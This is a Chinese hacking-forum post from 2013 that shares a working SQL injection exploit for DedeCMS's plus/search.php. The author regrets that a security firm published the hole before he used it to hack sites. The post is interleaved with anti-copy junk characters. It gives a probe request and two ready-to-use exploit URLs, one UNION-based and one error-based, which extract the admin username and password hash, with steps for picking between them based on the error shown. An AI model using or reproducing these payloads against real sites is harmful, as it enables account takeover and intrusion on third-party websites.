转载不加作者名的没JJ9 D$ w4 E% E% W* u) y
$ z# i" ^4 ^, j% b8 z4 `7 U哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
9 g" d" K+ o0 ^2 u3 n, l3 m2 g& ?( ~ q" v
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
0 n3 w$ z* G0 i! ]9 h. q# p( @
5 v5 G" a. u0 l9 Z& R2 r2 z我一般是这样测试的:5 [$ E6 {0 `3 g7 v/ L5 _
. l* {5 |) }% r) v0 y+ z
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a4 \2 i8 J% S. p8 |) V: n* P% P
0 P/ a2 U' D9 \5 o8 t! ^0 z2 o* e8 v- `转载不加作者名的没JJ. I) F. G- L- n6 T8 b* }
- |6 _: e8 k% M" H( p2 e+ ]& G
作者:鬼哥. h$ J' z2 @' \+ a
, f" b$ s* l3 }; x X
) q4 L) y! o! n4 f2 H6 ^7 B
/ R$ g& v- T. ^! J看结果如果提示
w' U/ _& M4 P0 P) L; f9 m7 _& c
Safe Alert: Request Error step 2 !
0 w" x/ w5 W/ x* E9 h: A; E. p1 G& J) e- Y
那么直接用下面的exp
: w! M* E7 h7 ^5 B( E. A6 L8 J
" X j: J7 m5 L1 }. `1 Txx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
* S4 s/ R/ w0 J) j+ ]1 \. M z7 T% R
# _. }6 R' f; z. D) y/ y# a
& m; Q# V- l5 n$ l# K看结果如果提示
; F3 q+ R! c8 [' M: r/ W) P5 n" J* F( D; H( W w
Safe Alert: Request Error step 1 !
( }/ E4 r R5 b4 L8 c/ @& y E( P1 ^! T
那么直接用下面的exp
( k, q! {6 N, ^ k6 b$ f
5 o* z, ~& Q8 F% k' ~xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a" A! @0 W4 Y; S1 ~
' k+ M8 M6 V7 h& s6 O! C
6 U& U2 F/ I; q4 |6 {. J! M& A
如果正常显示证明漏洞不存在了。, Z$ A" s9 U; H
6 H* ]. F( f) u( g$ w
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对